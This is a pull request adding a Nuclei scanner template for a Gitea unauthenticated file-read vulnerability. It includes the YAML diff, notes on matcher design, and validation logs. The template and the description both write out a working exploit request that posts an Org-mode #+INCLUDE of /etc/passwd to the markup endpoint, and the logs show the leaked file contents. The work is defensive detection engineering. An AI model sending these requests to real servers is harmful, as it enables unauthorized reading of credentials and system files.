### PR TITLE
Add CVE-2026-59774 - Gitea Unauthenticated Arbitrary File Read

### DIFF
--- a/http/cves/2026/CVE-2026-59774.yaml
+++ b/http/cves/2026/CVE-2026-59774.yaml
@@ -1,0 +1,80 @@
+id: CVE-2026-59774
+
+info:
+  name: Gitea 1.22.1-1.27.0 - Unauthenticated Arbitrary File Read
+  author: ashish-cybersec
+  severity: critical
+  description: |
+    Gitea versions 1.22.1 through 1.27.0 initialize the go-org markup renderer without replacing its default ReadFile callback. An unauthenticated attacker can submit Org-mode markup containing an #+INCLUDE directive with an absolute path to the repository markup endpoint of any public repository, causing the server to read and render arbitrary files accessible to the Gitea service user.
+  impact: |
+    Unauthenticated attackers can read arbitrary files readable by the Gitea service user, including app.ini which contains INTERNAL_TOKEN, OAuth and JWT material, and database credentials. The advisory notes this can be escalated to command execution via Git hook injection.
+  remediation: |
+    Update to Gitea version 1.27.1 or later.
+  reference:
+    - https://github.com/go-gitea/gitea/security/advisories/GHSA-6v53-hr58-556r
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-59774
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2026-59774
+    cwe-id: CWE-22
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: go-gitea
+    product: gitea
+    shodan-query: http.title:"Gitea"
+    fofa-query: title="Gitea"
+  tags: cve,cve2026,gitea,lfi,traversal,markup
+
+flow: http(1) && http(2)
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/api/v1/repos/search?limit=1"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, "\"full_name\":")'
+        condition: and
+        internal: true
+
+    extractors:
+      - type: json
+        name: reponame
+        json:
+          - '.data[0].full_name'
+        internal: true
+
+  - raw:
+      - |
+        POST /{{reponame}}/markup HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        mode=file&file_path=a.org&text=%23%2BINCLUDE%3A%20%22%2Fetc%2Fpasswd%22%20src%20shell
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: body
+        words:
+          - "chroma language-bash"
+
+      - type: regex
+        part: body
+        regex:
+          - 'root:.*:0:0:'
+
+    extractors:
+      - type: regex
+        part: body
+        regex:
+          - 'root:.*:0:0:[^<]*'

--- a/http/cves/2026/CVE-2026-59774.yaml
+++ b/http/cves/2026/CVE-2026-59774.yaml
@@ -59,10 +59,6 @@ http:
 
     matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 200
-
       - type: word
         part: body
         words:
@@ -73,8 +69,6 @@ http:
         regex:
           - 'root:.*:0:0:'
 
-    extractors:
-      - type: regex
-        part: body
-        regex:
-          - 'root:.*:0:0:[^<]*'
+      - type: status
+        status:
+          - 200


### PR DESCRIPTION
### PR Information

- Added CVE-2026-59774 - Gitea 1.22.1-1.27.0 Unauthenticated Arbitrary File Read
- References:
  - https://github.com/go-gitea/gitea/security/advisories/GHSA-6v53-hr58-556r
  - https://nvd.nist.gov/vuln/detail/CVE-2026-59774

This CVE was previously submitted in #16756 and closed as unvalidatable. Credit to @str4k3r for raising it first. That template targeted `/admin/pub/markup`, which does require authentication. Per GHSA-6v53-hr58-556r the vulnerable route is the **repository** markup endpoint, `POST /{owner}/{repo}/markup`, which is reachable anonymously on any public repository. I've reproduced it locally and included the debug output below.

Detection uses a two-request flow. The first request queries `/api/v1/repos/search?limit=1` (anonymous, same endpoint already used by `gitea-public-repo-exposure.yaml`) and extracts a repository `full_name`; a repository must exist, as the markup route returns 404 otherwise. The second request posts the Org-mode payload to that repository's markup endpoint.

Two notes on matcher design:

1. Of the `#+INCLUDE` variants, only `src`/`export` block forms render file contents. The bare and `example` forms return an empty body, so the payload uses `src shell`.
2. A **patched** instance still returns HTTP 200 with a `chroma language-bash` block containing the literal string `/etc/passwd` — the directive is rendered rather than executed. Matching on the path alone would false-positive. The template therefore requires the actual file contents (`root:.*:0:0:`).

### Template validation

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [x] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details

Tested against official images `gitea/gitea:1.27.0` (vulnerable) and `gitea/gitea:1.27.1` (patched), sqlite3 backend, one public repository created on each.

**Requests sent (no cookie, no authorization header):**

```
GET /api/v1/repos/search?limit=1 HTTP/1.1
Host: 127.0.0.1:3000

POST /testadmin/public-test/markup HTTP/1.1
Host: 127.0.0.1:3000
Content-Type: application/x-www-form-urlencoded

mode=file&file_path=a.org&text=%23%2BINCLUDE%3A%20%22%2Fetc%2Fpasswd%22%20src%20shell
```

**True positive — gitea 1.27.0:**

```
[CVE-2026-59774] [http] [critical] http://127.0.0.1:3000/testadmin/public-test/markup ["root:x:0:0:root:/root:/bin/sh\nbin:x:1:1:bin:/bin:/sbin/nologin\n...\ngit:x:1000:1000::/data/git:/bin/bash"]
[INF] Scan completed in 12.952338ms. 1 matches found.
```

**False positive check — gitea 1.27.1, identical setup:**

```
[INF] Scan completed in 13.381266ms. 0 matches found.
```

The patched instance returns 200 with the directive rendered as literal text:

```
<pre><code class="chroma language-bash"><span class="c1">#+INCLUDE: [[/etc/passwd]]</span></code></pre>
```

**Honeypot check against honey.scanme.sh:**

```
[INF] Scan completed in 592.253596ms. No results found.
```

`nuclei -validate` passes and the file lints clean against `.yamllint`.